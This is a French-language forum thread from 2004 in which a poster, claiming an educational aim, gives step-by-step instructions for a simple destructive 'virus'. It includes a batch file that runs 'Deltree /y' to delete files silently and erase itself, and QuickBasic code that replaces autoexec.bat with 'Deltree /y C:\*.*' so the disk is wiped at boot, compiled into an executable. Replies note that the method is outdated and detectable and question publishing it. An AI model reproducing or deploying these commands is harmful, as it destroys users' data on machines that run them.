Non connecté. Connectez-vous ou devenez membre (gratuit).Recherche rapide :     
Aller à :  

Messages | Nouvelle branche de discussion | Répondre | Rechercher
Etude d'un virus
Posté par jim462 le 20/08/2004 07:56:16
Comment faire un virus pour mieux les combattre. Pour combattre les virus et leur échapper, il faut savoir comment ils sont faits. Je vais donc vous montrer comment faire vous-même le virus le plus simple du monde.

Connaissez vous les fichiers qui ont comme extension .Bat ? Non ? Ce sont des petits fichiers qui ont comme icône un petit engrenage. A l'origine, ils ont été crées pour simplifier l'utilisation de Windows. Lancez une recherche et dans la case nommée, vous tapez *.bat ce qui veux dire tous les .Bat . Vous verrez que (seulement si vous pouvez voir les fichiers cachés) il y en a pas mal mais surtout ne les lancez pas. Ces petits fichiers peuvent détruire un fichier. Exemple : Ouvrez l'éditeur de texte, tapez y n'importe quoi puis enregistrez le sous C : et nommez le Test.txt et fermez l'éditeur de texte. Maintenant réouvrez le puis tapez y « Deltree C:\Test.txt » et enregistrez le sous C : et nommez le Detruit.bat et fermez l'éditeur de texte. Normalement, Detruit.bat a l'icône d'un .Bat sinon c'est qu'après .bat il y a .txt alors dans ce cas, vous devez supprimer .txt . Maintenant, lancez le .Bat . Une fenêtre noire doit s'ouvrir et doit afficher :
C:\>Deltree C:\Test.txt
Effacer le fichier « C:\Test.txt » ? [on]

Alors là, on tape « o » et la fenêtre affiche :
Suppression de C:\Test.txt...
Et en effet, notre fichier Text.txt à bien disparut. Mais cela n'est pas intéressant car il nous demande une confirmation donc nous allons changer le contenu de notre .Bat mais nous avons vu que lorsqu'on clique dessus, il se lance alors on clique droit dessus et on sélectionne Edition (ou Modifier selon les ordinateurs). Et nous allons remplacer tout le contenu par :
« Deltree /y C:\Test.txt » et là si vous le relancez, vous verrez qu'il ne demande plus de confirmation. Nous pouvons même rajouter « Deltree /y C:\ Detruit.bat » comme cela il ne restera pas de trace.

Mais personne ne cliquera sur votre .Bat Il faudrait quelque chose qui le transforme en .Exe ou un .Exe qui le fabrique. Le premier n'existe pas mais le second est possible. Nous pouvons le fabriquer avec QuickBasic et le mettre à la place de Autoexec.bat qui se lance à chaque démarrage de l'ordinateur avant même Windows, c'est fantastique !
Il vous faut QuickBasic.
Il ne s'installe pas, vous dézippez tout dans un même répertoire et vous lancez Qbx.exe puis si une fenêtre paramètres s'ouvre, vous cliquez sur OK, vous devriez arriver dans une fenêtre dos (plein écran c'est mieux) de couleur bleue. Là vous tapez:
« n$= « C:\autoexec.bat »
Open n$ for output as #1
Print # 1 « Deltree /y C:\*.* »
Close »
Ce qui signifie que l'on crée un fichier nommé Autoexec.Bat (en fait on le remplace) et on met dedans Deltree /y C:\*.* , en gros, on formatte de Disque Dur. Donc pour faire un .Exe on va dans la rubrique Run puis Make an Exe file. Mais Il faut enregistrer avant. Et voila, vous avez votre virus.
Donc pour parer à ce virus il suffit de démarrer en mode Dos et de taper Deltree C:\autoexec.bat et à la demande de confirmation, on valide.

Rapport d'abus     Modifier     Supprimer    
Re: Etude d'un virus
Posté par penpen-le-barbare le 20/08/2004 07:56:16
bon...
en réalité c'est un peu plus compliqué que ça les virus qui tournent en ce moment.
mais l'auteur de cet article est dans le vrai. une chose si simple est un virus.

Par contre ! petite remarque !!
évitez de faire la manip chez vous, je vous déconseille fortement le "deltree c:\autoexec.bat" qui risque de causer quelques désagréments.

Rapport d'abus     Modifier     Supprimer    
Re: Etude d'un virus
Posté par aispirit le 20/08/2004 07:56:16
Comme le dis penpen-le-barbare, les virus actuels sont beaucoups compliqués que celui-ci.
Premièrement, ton fichier sera détecté par l'antivirus de la cible, si celui-ci est un tant soit peu performant. (par émulation du code source)
Deuxièment, la commande MsDos DELTREE n'est pas valide pour tous les OS (seulement Windows) et en plus, pas pour Windows Xp.

Les virus ne sont pas codés en 2 secondes car il faut établir plusieurs "procotoles" pour ceux-ci : camouflage (notamment polymorphisme), attaque, ...
Bref, loin de là l'envie de faire un article sur ce sujet (on en trouve en 2 sec sur le Net, et puis c'est pas très cool d'expliquer comment en réaliser, surtout qu'aptrès avoir envoyé un virus, les chances de se faire prendre sont proches de ...100%).

Rapport d'abus     Modifier     Supprimer    
Re: Etude d'un virus
Posté par jim462 le 20/08/2004 07:56:16
Je suis tout a fait d'accord avec toi. Mais je n'ai tout d'abord les compétences pour créer un virus en C++ ou en ASM (peut être bientot) mais même si je les avais, je ne metrait pas le mode d'emploi pour en faire un sur internet, il y en a déjà assez qui circullent comme ca. Non ,celui la c'est pour le principe et puis, il est facilement détectable par l'antivirus le plus simple et ne se propage pas de poste en poste.
C'est vrai que l'on ne peu pas le considérer comme un vers (car il ne se propage pas) mais, c'est bel et bien un Virus. Donc Attention.

Rapport d'abus     Modifier     Supprimer    
Re: Etude d'un virus
Posté par pigeon-warrior68 le 20/08/2004 07:56:16
je trouve que c'est un excellent article . Il apprend des choses !

Rapport d'abus     Modifier     Supprimer    
Re: Etude d'un virus
Posté par shouanli le 26/09/2004 17:52:27
je ne suis pas d accord avec aispirit, je suis a la recheche des codes sources des virus pour les etudier. je suis pour open source c est comme ca qu on avance. de toute facon en cours info. le prof te montre comment faire avec 3 mots pour causer des dommages au ordi. mais en etant conscient on ne le fais pas car on nous dans la m....!

Rapport d'abus     Modifier     Supprimer    
La participation aux forums est réservée aux membres du site.
Devenir membre (30 secondes et gratuit)    Mot de passe perdu ?
Nom d'utilisateur :
Mot de passe :
  Devenir membre (30 secondes et gratuit)
Devenir membre (30 secondes et gratuit)    Mot de passe perdu ?
Recevoir la lettre d'information :
Connectés :
    0 membres et 156 visiteurs

tubededentifrice.com, ...    CNIL: 752143.     |]  ▲